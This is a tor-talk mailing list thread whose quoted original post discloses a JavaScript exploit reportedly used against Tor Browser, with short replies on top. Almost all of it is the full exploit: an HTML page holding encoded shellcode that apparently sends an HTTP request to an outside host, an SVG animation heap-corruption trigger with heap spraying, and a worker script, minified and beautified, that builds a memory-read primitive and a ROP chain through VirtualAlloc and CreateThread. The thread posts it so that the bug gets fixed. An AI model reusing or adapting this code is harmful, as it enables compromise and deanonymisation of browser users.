[tor-talk] Javascript exploit

Kristov Atlas kristovatlas.lists at gmail.com
Wed Nov 30 05:03:15 UTC 2016


For anyone looking into it, I tried to clean up cssbanner.js a little more.

https://gist.github.com/kristovatlas/e03be5f10e48801aec88b0e23f00a3d7

I didn't actually compare execution before and after my changes, so caveat
emptor.

On Tue, Nov 29, 2016 at 6:31 PM, Kevin <kevinsisco61784 at gmail.com> wrote:

> The first var looks like an encryption key.  Just my humble observation
> and food for thought.
>
>
>
>
> On 11/29/2016 4:55 PM, firstwatch at sigaint.org wrote:
>
>> This is a JavaScript exploit actively used against Tor Browser NOW. It
>> consists of one HTML and one JavaScript file, both pasted below and also
>> de-obfuscated. The exact functionality is unknown, but it is getting access to
>> "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I
>> had to break the "thecode" line in two in order to post; remove the ' + ' in
>> the middle to restore it.
>>
>> HTML:
>>
>> <html>
>>    <head>
>>      <script>
>>
>>    var thecode
>> ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u52
>> 8b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc1
>> 20\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u85
>> 78\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b
>> 34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3b
>> f8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8b
>> d3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b
>> 5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc0
>> 85\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5
>> ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u80
>> 29\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u50
>> 40\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u00
>> 01\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u89
>> 51\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u02
>> 48\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude
>> 49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue8
>> 57\u00fa\u0000\u895e\u8dca\ua7bd\u0002
>>   \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1
>> \ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002
>> \u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f'
>> +
>> '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408
>> d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e
>> 6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70
>> f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue78
>> 9\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u770
>> 9\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u300
>> 4\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8
>> b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u535
>> 7\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u685
>> 3\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc34
>> 9\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004
>> f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\ufff
>> f\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a6
>> 7\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203
>> a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u470
>> 0\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u313
>> 2\u2032\u5448\u5054\u312f\u312e\u0a0d\
>>   u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\
>> u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\
>> u0000\u0000\u4190';
>>
>>
>>      var worker = new Worker('cssbanner.js');
>>
>>        worker.postMessage(thecode);
>>
>>        var svgns = 'http://www.w3.org/2000/svg';
>>        var heap80 = new Array(0x1000);
>>        var heap100 = new Array(0x4000);
>>        var block80 = new ArrayBuffer(0x80);
>>        var block100 = new ArrayBuffer(0x100);
>>        var sprayBase = undefined;
>>        var arrBase = undefined;
>>
>>        var animateX = undefined;
>>        var containerA = undefined;
>>
>>        var offset = 0x90;
>>        if
>> (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat
>> or.userAgent))
>>        {
>>          offset = 0x88; // versions 47.0 or greater
>>        }
>>
>>        var $ = function(id) { return document.getElementById(id); }
>>
>>        var exploit = function()
>>        {
>>          var u32 = new Uint32Array(block80)
>>          u32[0x2] = arrBase - offset;
>>          u32[0x8] = arrBase - offset;
>>          u32[0xE] = arrBase - offset;
>>
>>
>>          for(i = heap100.length/2; i < heap100.length; i++)
>>          {
>>            heap100[i] = block100.slice(0)
>>          }
>>
>>          for(i = 0; i < heap80.length/2; i++)
>>          {
>>            heap80[i] = block80.slice(0)
>>          }
>>
>>          animateX.setAttribute('begin', '59s')
>>          animateX.setAttribute('begin', '58s')
>>
>>          for(i = heap80.length/2; i < heap80.length; i++)
>>          {
>>            heap80[i] = block80.slice(0)
>>          }
>>
>>          for(i = heap100.length/2; i < heap100.length; i++)
>>          {
>>            heap100[i] = block100.slice(0)
>>          }
>>
>>          animateX.setAttribute('begin', '10s')
>>          animateX.setAttribute('begin', '9s')
>>          window.dump('PAUSING!!! YAYA');
>>          containerA.pauseAnimations();
>>      }
>>
>>         worker.onmessage = function(e)
>>         {
>>                 worker.onmessage = function(e)
>>                 {
>>          window.setTimeout(function()
>>            {
>>              worker.terminate();
>>
>>              document.body.innerHTML = '';
>>              document.getElementsByTagName('head')[0].innerHTML = '';
>>              document.body.setAttribute('onload', '')
>>            }, 1000);
>>                 }
>>
>>                 arrBase = e.data;
>>                 exploit();
>>      }
>>
>>
>>      var idGenerator = function()
>>      {
>>        return 'id' +
>> (((1+Math.random())*0x10000)|0).toString(16).substring(1);
>>      }
>>
>>
>>      var craftDOM = function()
>>      {
>>        containerA = document.createElementNS(svgns, 'svg')
>>        var containerB = document.createElementNS(svgns, 'svg');
>>
>>        animateX = document.createElementNS(svgns, 'animate')
>>        var animateA = document.createElementNS(svgns, 'animate')
>>        var animateB = document.createElementNS(svgns, 'animate')
>>
>>        var animateC = document.createElementNS(svgns, 'animate')
>>
>>        var idX = idGenerator();
>>        var idA = idGenerator();
>>        var idB = idGenerator();
>>        var idC = idGenerator();
>>
>>        animateX.setAttribute('id', idX);
>>        animateA.setAttribute('id', idA);
>>        animateA.setAttribute('end', '50s');
>>        animateB.setAttribute('id', idB);
>>        animateB.setAttribute('begin', '60s');
>>        animateB.setAttribute('end', idC + '.end');
>>        animateC.setAttribute('id', idC);
>>        animateC.setAttribute('begin', '10s');
>>        animateC.setAttribute('end', idA + '.end');
>>
>>        containerA.appendChild(animateX)
>>        containerA.appendChild(animateA)
>>        containerA.appendChild(animateB)
>>
>>        containerB.appendChild(animateC)
>>
>>        document.body.appendChild(containerA);
>>        document.body.appendChild(containerB);
>>      }
>>       window.onload = craftDOM;
>>     //
>>      </script>
>>
>>      <style>
>>          #mtdiv{
>>              position: absolute;
>>              width: 960px;
>>              height: 166px;
>>              z-index: 15;
>>              top: 100px;
>>              left: 50%;
>>              margin: 0 0 0 -480px;
>>          }
>>      </style>
>>    </head>
>>    <body bgcolor='#2F3236'>
>>
>>        <div id='mtdiv'>
>>            <img src='mt.png'/>
>>        </div>
>>    </body>
>>    <script>
>>          setTimeout('window.location = \'member.php\';', 2000);
>>   </script>
>>
>> </html>
>>
>> ============================================================
>> =======================================
>>
>> content of "cssbanner.js":
>>
>> self.onmessage = function(msg) {
>>
>>    thecode = msg.data;
>>    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
>> & 65535) + String.fromCharCode(a) };
>>    function
>> Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;t
>> his._abs_read=function(a){a>=this._base_addr?a=this._read(a-
>> this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._
>> read(a));return
>> 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this.
>> _base_addr?this._write(a-this._base_addr,b):(a=4294967295-
>> this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return
>> this.read(a)&255};this.readWord=function(a){return
>> this.read(a)&65535};this.readDword=function(a){return this.read(a)};
>>    this.read=function(a,b){if(a%4){var
>> c=this._abs_read(a&4294967292),d=this._abs_read(a+4&42949672
>> 92),e=a%4;return
>> c>>>8*e|d<<8*(4-e)}return
>> this._abs_read(a)};this.readStr=function(a){for(var
>> b="",c=0;;){if(32==c)return"";var
>> d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return
>> b};this.write=function(a){}}
>>    function PE(b,a){this.mem=b;this.export_table=this.module_base=void
>> 0;this.export_table_size=0;this.import_table=void
>> 0;this.import_table_size=0;this.find_module_base=function(a)
>> {for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return
>> this.module_base=a;a-=65536}};this._resolve_pe_structures=fu
>> nction(){peFile=this.module_base+this.mem.readWord(this.modu
>> le_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad
>> NT
>> Signature";this.pe_file=peFile;this.optional_header=this.pe_
>> file+36;this.export_directory=
>>    this.module_base+this.mem.readDword(this.pe_file+120);this.
>> export_directory_size=this.mem.readDword(this.pe_file+
>> 124);this.import_directory=this.module_base+this.mem.
>> readDword(this.pe_file+128);this.import_directory_size=
>> this.mem.readDword(this.pe_file+132)};this.resolve_
>> imported_function=function(a,b){void
>> 0==this.import_directory&&this._resolve_pe_structures();for(var
>> e=this.import_directory,c=e+this.import_directory_size;e<c;){var
>> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base
>> );if(a.toUpperCase()==
>>    d.toUpperCase()){for(var
>> c=this.mem.readDword(e)+this.module_base,e=this.mem.readDwor
>> d(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=
>> d;){if(this.mem.readStr(d+this.module_base+2).toUpperCas
>> e()==b.toUpperCase())return
>> this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}br
>> eak}e+=20}return
>> 0};void 0!=a&&this.find_module_base(a)}
>>    function ROP(b,a){this.mem=b;this.pe=new
>> PE(b,a);this.pe._resolve_pe_structures();this.module_base=th
>> is.pe.module_base+4096;this.findSequence=function(a){for(var
>> b=0;;){for(var
>> e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base
>> +b+c)==a[c]&&e==c)e++;else
>> break;if(e==a.length)return
>> this.module_base+b;b++}};this.findStackPivot=function(){return
>> this.findSequence([148,195])};this.findPopRet=function(a){return
>> this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void
>> 0!=c?c:new ArrayBuffer(4096);
>>    c=new Uint32Array(c);var
>> d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.
>> resolve_imported_function("kernel32.dll","VirtualAlloc");c[
>> 0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>
>> 2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;
>> c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836 <(343)%20597-3836>
>> ;return
>> c}}
>>    var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new
>> Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;
>> convu32[1]=a;return
>> convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return
>> convu32[a]},sprayArrays=function(){for(var
>> b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.leng
>> th;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=
>> qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBa
>> se+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=
>> qword2Double(arrBase+
>>    o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)
>> /8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5
>> ,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(
>> o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Doub
>> le(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),
>> b[a+(o7+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840>
>> ),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[
>> a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(
>> 1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/
>>    8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=
>> qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),
>> b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double
>> (0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0)
>> ,b[a+(o11+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840>
>> ),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[
>> a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=
>> qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,
>> arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+
>>    (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)
>> spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(
>> \.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_
>> offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.
>> test(navigator.userAgent)&&(vtable_offset=308);
>>    var spr=Array(400),arrBase=805306416,ropArrBuf=new
>> ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,
>> o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new
>> Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;
>> fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u90
>> 90");sprayArrays();postMessage(arrBase);
>>    for(memarrayloc=void 0;void
>> 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset
>> <spr[i].length;offset+=512)if("object"!=typeof
>> spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+
>> 1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=
>> qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrB
>> ase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+
>> 16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27)
>> ;spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][
>> offset+(o5+0)/8]=qword2Double(arrBase+
>>    o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][o
>> ffset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var
>> mem=new Memory(memarrayloc+48,function(b){return
>> memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDw
>> ord(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf
>> ;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+
>> 1]=null;ropBase=mem.readDword(ropPtr+16);var
>> rop=new
>> ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
>>    var backupESP=rop.findSequence([137,1,195]),ropChain=new
>> Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=
>> rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var
>> i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
>> ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i+
>> +]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187
>> ;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ro
>> pChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++
>> ]=280697892;ropChain[i++]=704643071;
>>    ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[
>> i++]=2425393407;for(var
>> j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(
>> j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=
>> qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=
>> qword2Double(0,256);spr[arr_index][arr_offset+2]=
>> qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+
>> 168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)
>> /8]=qword2Double(0,2);postMessage("GREAT
>> SUCCESS");
>>
>> };
>>
>>
>> Beautified:
>>
>> self.onmessage =
>> function(msg) {
>>
>>    thecode = msg.data;
>>    var pack = function (b) { var a = b >> 16; return String.fromCharCode(b
>> & 65535) + String.fromCharCode(a) };
>>
>>    function Memory(b,a,f)
>>    {
>>        this._base_addr=b;
>>        this._read=a;
>>        this._write=f;
>>        this._abs_read = function(a) {
>>            a >= this._base_addr ? a = this._read( a - this._base_addr) : (
>> a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) );
>>            return 0>a?4294967295+a+1:a
>>
>>        };
>>        this._abs_write = function(a,b) {
>>            a >= this._base_addr ? this._write(a - this._base_addr, b) : (
>> a
>> = 4294967295 - this._base_addr + 1 + a, this._write(a,b) )
>>        };
>>        this.readByte = function(a) {
>>            return this.read(a) & 255
>>
>>        };
>>        this.readWord = function(a) {
>>            return this.read(a) & 65535
>>        };
>>        this.readDword = function(a){ return this.read(a) };
>>        this.read = function(a,b) {
>>            if (a%4) {
>>                var c = this._abs_read( a & 4294967292),
>>                    d = this._abs_read( a+4 & 4294967292),
>>                    e = a%4;
>>                return c>>>8*e | d<<8*(4-e)
>>            }
>>            return this._abs_read(a)
>>        };
>>        this.readStr = function(a) {
>>            for(var b = "", c = 0;;) {
>>                if (32 == c)
>>                    return "";
>>                var d = this.readByte(a+c);
>>                if(0 == d)
>>                    break;
>>                b += String.fromCharCode(d);
>>                c++
>>            }
>>            return b
>>
>>        };
>>        this.write = function(a){}
>>    }
>>    function PE(b,a) {
>>        this.mem = b;
>>        this.export_table = this.module_base = void 0;
>>        this.export_table_size = 0;
>>        this.import_table = void 0;
>>        this.import_table_size = 0;
>>        this.find_module_base = function(a) {
>>            for(a &= 4294901760; a; ) {
>>                if(23117 == this.mem.readWord(a))
>>                    return this.module_base=a;
>>                a -= 65536
>>            }
>>        };
>>        this._resolve_pe_structures = function() {
>>            peFile = this.module_base + this.mem.readWord(this.module_
>> base+60);
>>            if(17744 != this.mem.readDword(peFile))
>>                throw"Bad NT Signature";
>>            this.pe_file = peFile;
>>            this.optional_header = this.pe_file+36;
>>            this.export_directory =
>> this.module_base+this.mem.readDword(this.pe_file+120);
>>            this.export_directory_size = this.mem.readDword(this.pe_fil
>> e+124);
>>            this.import_directory=this.module_base+this.mem.readDword(
>> this.pe_file+128);
>>            this.import_directory_size=this.mem.readDword(this.pe_file+
>> 132)};
>>            this.resolve_imported_function=function(a,b){
>>                void 0==this.import_directory&&this
>> ._resolve_pe_structures();
>>                for(var
>> e=this.import_directory,c=e+this.import_directory_size;e<c;){
>>                    var
>> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);
>>                    if(a.toUpperCase()==d.toUpperCase()){
>>                        for(var c = this.mem.readDword(e) +
>> this.module_base,
>>                                e = this.mem.readDword(e+16) +
>> this.module_base,
>>                                d = this.mem.readDword(c),
>>                                f = 0 ; 0 !=d ;)
>>                        {
>>                            if(this.mem.readStr(d+this.mo
>> dule_base+2).toUpperCase()
>> == b.toUpperCase())
>>                                return this.mem.readDword(e+4*f);
>>                            f++;
>>                            d = this.mem.readDword(c+4*f)
>>                        }
>>                        break
>>                    }
>>                    e+=20
>>                }
>>                return 0
>>            };
>>            void 0!=a && this.find_module_base(a)
>>        }
>>        function ROP(b,a){
>>           this.mem = b;
>>           this.pe = new PE(b,a);
>>           this.pe._resolve_pe_structures();
>>           this.module_base = this.pe.module_base+4096;
>>           this.findSequence = function(a) {
>>              for(var b=0;;) {
>>                  for(var e=0,c=0;c<a.length;c++)
>>                      if(this.mem.readByte(this.mod
>> ule_base+b+c)==a[c]&&e==c)
>>                          e++;
>>                      else
>>                          break;
>>                  if(e==a.length)
>>                      return this.module_base+b;
>>                  b++
>>
>>           }
>>
>>       };
>>       this.findStackPivot=function() {
>>           return this.findSequence([148,195])
>>
>>       };
>>       this.findPopRet=function(a) {
>>           return this.findSequence([88,195])
>>
>>       };
>>       this.ropChain=function(a,b,e,c) {
>>           c = void 0 != c ? c : new ArrayBuffer(4096);
>>           c = new Uint32Array(c);
>>           var d = this.findStackPivot(),
>>               f = this.findPopRet("EAX"),
>>               g =
>> this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");
>>           c[0]= f+1;
>>           c[1]= f;
>>           c[2]= a+b+4*e+4;
>>           c[3]= d;
>>           for(i=0;i<e;i++)
>>               c[(b>>2)+i] = d;
>>           d =(b+4>>2)+e;
>>           c[d++]=g;
>>           c[d++]=a+(b+4*e+28);
>>           c[d++]=a;
>>           c[d++]=4096;
>>           c[d++]=4096;
>>           c[d++]=64;
>>           c[d++]=3435973836;
>>           return c
>>       }
>>    }
>>    var conv=new ArrayBuffer(8),
>>        convf64=new Float64Array(conv),
>>        convu32=new Uint32Array(conv),
>>        qword2Double=function(b,a) {
>>            convu32[0]=b;
>>            convu32[1]=a;
>>            return convf64[0]
>>        },
>>        doubleFromFloat = function(b,a) {
>>            convf64[0]=b;
>>            return convu32[a]
>>
>>        },
>>        sprayArrays=function() {
>>            for(var b=Array(262138),a=0;262138>a;a++)
>>                b[a]=fzero;
>>            for(a=0;a<b.length;a+=512)
>>                b[a+1] = memory,
>>                b[a+21] = qword2Double(0,2),
>>                b[a+14] = qword2Double(arrBase+o1,0),
>>                b[a+(o1+8)/8] = qword2Double(arrBase+o2,0),
>>                b[a+(o2+0)/8] = qword2Double(2,0),
>>                b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13),
>>                b[a+(o3+0)/8] = qword2Double(16,0),
>>                b[a+(o3+24)/8] = qword2Double(2,0),
>>                b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4),
>>                b[a+(o4+0)/8] = qword2Double(0,arrBase+o6),
>>                b[a+(o5+0)/8] = qword2Double(arrBase+o7,0),
>>                b[a+(o6+8)/8] = qword2Double(2,0),
>>                b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0),
>>                b[a+(o7+16)/8] = qword2Double(0,4026531840),
>>                b[a+(o7+32)/8] = qword2Double(0,3220176896),
>>                b[a+(o7+48)/8] = qword2Double(2,0),
>>                b[a+(o7+56)/8] = qword2Double(1,0),
>>                b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
>>                b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
>>                b[a+(o7+168)/8] = qword2Double(0,2),
>>                b[a+(o9+0)/8] = qword2Double(arrBase+o10,2),
>>                b[a+(o10+0)/8] = qword2Double(2,0),
>>                b[a+(o10+8)/8] = qword2Double(0,268435456),
>>                b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0),
>>                b[a+(o11+16)/8] = qword2Double(0,4026531840),
>>                b[a+(o11+32)/8] = qword2Double(0,3220176896),
>>                b[a+(o11+48)/8] = qword2Double(2,0),
>>                b[a+(o11+56)/8] = qword2Double(1,0),
>>                b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8),
>>                b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16),
>>                b[a+(o11+168)/8] = qword2Double(0,2);
>>            for(a=0;a<spr.length;a++)
>>                spr[a]=b.slice(0)
>>        }, vtable_offset=300;
>>        /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?
>> vtable_offset=304 :
>>        /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat
>> or.userAgent)
>> && (vtable_offset=308);
>>        var spr=Array(400),
>>        arrBase=805306416,
>>        ropArrBuf=new ArrayBuffer(4096),
>>        o1=176,
>>        o2=256,
>>        o3=768,
>>        o4=832,
>>        o5=864,
>>        o6=928,
>>        o7=1024,
>>        o8=1280,
>>        o9=1344,
>>        o10=1376,
>>        o11=1536,
>>        oRop=1792,
>>        memory=new Uint32Array(16),
>>        len=memory.length,
>>        arr_index=0,
>>        arr_offset=0;
>>        fzero=qword2Double(0,0);
>>        0!=thecode.length%2&&(thecode+="\u9090");
>>        sprayArrays();
>>        postMessage(arrBase);
>>        for(memarrayloc=void 0;void 0==memarrayloc;)
>>            for(i=0;i<spr.length;i++)
>>                for(offset=0;offset<spr[i].length;offset+=512)
>>                   if("object" != typeof spr[i][offset+1]) {
>>                       memarrayloc=doubleFromFloat(spr[i][offset+1],0);
>>                       arr_index=i;
>>                       arr_offset=offset;
>>                       spr[i][offset+(o2+0)/8]=qword2Double(65,0);
>>                       spr[i][offset+(o2+8)/8]=qword2
>> Double(arrBase+o3,memarrayloc+27);
>>                       for(j=0;33>j;j++)
>>                           spr[i][offset+(o2+16)/8+j]=qwo
>> rd2Double(memarrayloc+27,memarrayloc+27);
>>                       spr[i][offset+(o3+8)/8]=qword2Double(0,0);
>>                       spr[i][offset+(o5+0)/8]=qword2
>> Double(arrBase+o11,0);
>>                       spr[i][offset+(o7+168)/8]=qword2Double(0,3);
>>                       spr[i][offset+(o7+88)/8]=qword2Double(0,2);
>>                       break
>>                   }
>>        for(;memory.length==len;);
>>        var mem=new Memory(memarrayloc+48,
>>                           function(b){return memory[b/4]},
>>                           function(b,a){memory[b/4]=a}),
>>            xulPtr=mem.readDword(memarrayloc+12);
>>        spr[arr_index][arr_offset+1]=ropArrBuf;
>>        ropPtr=mem.readDword(arrBase+8);
>>        spr[arr_index][arr_offset+1]=null;
>>        ropBase=mem.readDword(ropPtr+16);
>>        var rop=new ROP(mem,xulPtr);
>>        rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
>>        var backupESP=rop.findSequence([137,1,195]), ropChain=new
>> Uint32Array(ropArrBuf);
>>        ropChain[0]=backupESP;
>>        CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll
>> ","CreateThread");
>>        for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
>>        ropChain[i++]=3296825488;
>>        ropChain[i++]=2048;
>>        ropChain[i++]=1347469361;
>>        ropChain[i++]=1528949584;
>>        ropChain[i++]=3092271187;
>>        ropChain[i++]=CreateThread;
>>        ropChain[i++]=3096498431;
>>        ropChain[i++]=arrBase+16;
>>        ropChain[i++]=1955274891;
>>        ropChain[i++]=280697892;
>>        ropChain[i++]=704643071;
>>        ropChain[i++]=2425406428;
>>        ropChain[i++]=4294957800;
>>        ropChain[i++]=2425393407;
>>        for (var j=0;j<thecode.length;j+=2)
>>            ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeA
>> t(j+1);
>>        spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
>>        spr[arr_index][arr_offset+3]=qword2Double(0,256);
>>        spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
>>        spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
>>        spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
>>        postMessage("GREAT SUCCESS");
>> };
>>
>>
>>
>>
>
>
>
>
>

